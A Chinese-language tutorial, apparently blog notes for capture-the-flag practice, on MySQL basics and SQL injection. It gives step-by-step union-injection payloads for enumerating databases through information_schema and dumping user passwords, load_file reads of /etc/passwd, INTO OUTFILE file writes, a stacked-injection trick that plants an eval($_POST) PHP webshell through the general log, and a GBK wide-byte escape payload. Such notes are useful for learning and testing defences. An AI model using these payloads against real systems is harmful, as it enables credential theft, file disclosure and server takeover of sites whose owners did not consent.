MySQL基础
基本操作
显示数据库 show databases;
打开数据库 use db_name;
显示数据表 show tables;
显示表结构 describe table_name;
显示表中各字段信息,即表结构 show columns from table_name;
显示表创建过程 show create table 表名;
列出当前mysql的相关状态信息 status;
删除数据库 drop database 数据库名;
清空数据表 delete from table_name; 或 truncate table table_name;
删除数据表 drop table table_name
数据库连接 mysql -u root -p
数据库退出 exit
注入类型
按回显方式划分:
有回显:
联合查询 > 构造联合查询语句,直接查看查询结果
报错注入 > 构造报错语句,在报错中查看结果
堆查询 > 多行语句执行,进而实现想要达到的目的
无回显:
盲注 > 布尔型/时间型 通过某种手段“爆破”结果
MySQL联合查询注入
联合查询常用套路
order by 猜列数 union select 跟列数找到回显点,对应的地方放查询语句
一、判断是否存在注入,注入是字符型还是数字型
SQL注入测试,输入 1'or '1234'='1234 ,此时查询条件判断恒为真,返回users表中所有的用户数据
二、猜解SQL查询语句中的字段数
输入1'or 1=1 order by n # ,在n时查询失败,则有n-1个字段数
三、确定显示的字段顺序
输入1'union select 1,2 #,查询成功
因此字段显示的顺序和输出也得到了确认,接下来就可以进一步利用union联合查询更快速地获取更多的数据
四、获取当前数据库名
输入1'union select 1,database()#,查询成功 说明当前的数据库力返回值
五、获取当前数据库的表名
输入1' union select 1, group_concat (table_name) from information_schema.tables where table_schema=database) #,查询成功
在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件
- SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
- TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个 schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
- COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。
六、获取表中的字段名
输入1' union select 1, group_concat (column_name) from information_schema.columns where table_name='users'#,查询成功
七、查询数据
输入1' or 1=1 union select group_concat(user_id, first_name, last_name), group_concat (password) from users #,查询成功
如果group_concat被过滤了,而又只能返回一条数据,怎么办?用Limit,例如 mysql» select username from users limit 0,1;
MySQL文件操作
MySQL变量
mysqld服务器维护两种变量。全局变量影响服务器的全局操作。会话变量影响具体客户端连接相关操作 服务器后动时,将所有全局变量初始化为默认值。可以在选项文件或命令行中指定的选项来更改这些默认值。服务器启动后,通过连接服务器并执行SET GLOBAL var_name语句可以更改动态全局变量。要想更改全局变量,必须具有SUPER权限 服务器还为每个客户端连接维护会话变量。连接时使用相应全局变量的当前值对客户端会话变量进行初始化。客户可以通过SET SESSION var_name语句来更改动态会话变量。设置会话变量不需要特殊权限,但客户可以只更改自己的会话变量,而不更改其它客户的会话变量
可以通过SHOW VARIABLES语句查看系统变量及其值
mysql› SHOW VARIABLES;
可以使用like语句来匹配和筛选
重要变量secure_file_priv
secure_file_priv对读写文件有影响 secure-file-priv参数是用来限制LOAD DATA,SELECT •••OUTFILE,andLOAD_FILE()传到哪个指定目录的 当secure_file_priv的值为null ,表示限制mysqld 不允许导入/导出。默认是null 当secure_file_priv的值为/tmp/,表示限制mysqld 的导入/导出只能发生在/tmp/目录 下 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
Mysql读文件
Select load_file('/flag');
SELECT CONVERT (LOAD_FILE("/etc/passwd") USING utf8) ;
Mysql写文件
select "<?php phpinfo();?>" into outfile "/tmp/1.php";
select "<?php phpinfo();?>" into dumpfile "/tmp/1.php";
outfile函数可以导出多行,而dumpfile只能导出一行数据 outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式
MySQL堆叠
适用范围
当secure_file_priv = NULL 时,使用堆叠注入
set global general_log=on;
set global general_log_file='C:/phpStudy/www/789.php';
select '<?php eval($_POST['a']) ?>';
之后通过HTTP POST连接并使用Webshell即可找到flag
堆叠注入
MySQL可以执行多条语句,多条语句之前用;做分隔。 简单的说,由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下,可利用此方法执行其他恶意语句,如RENAME、DROP等,堆叠注入可以用于执行任何SQL语句 条件:
$mysqli->multi_query($sql);
<aside> 💡
通常多语句执行时,若前条语句已返回数据,则之后的语句返回的数据通常无法返回前端页面。建议使用union联合注入,若无法使用联合注入,可考虑使用RENAME关键字,将想要的数据列名/表名更改成返回数据的SQL语句所定义的表/列名
</aside>
过滤select
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中
MySQL宽字节
宽字节注入基础
宽字节就是两个以上的字节,宽字节注入产生的原因就是各种字符编码的不当操作,使得我们可以通过宽字节编码绕过SQL注入防御,通常来说,一个gbk编码汉字,占用2个字节,一个utf-8编码的汉字,占用3个字节,在php中,我们可以通过输出echo strlen("和");来测试
宽字节注入
宽字节注入主要是源于程序员设置数据库编码与PHP编码设置不同的两个编码那么就有可能产生宽字节注入 PHP的编码为 UTF-8而MySqI的编码设置为了SET NAMES'gbk'或是 SET character_set_client =gbk,这样配置会引发编码转换从而导致的注入漏洞
实例
用户名输入:admin%df’ or 1=1#
转义后为:admin%df\\’ or 1=1#
SET character_set_client ='gbk'后: admin運' or 1=1#
执行语句:...where username='admin運‘ or 1=1#‘
此时or 1=1#‘成功逃逸,变为可执行语句
Comments NOTHING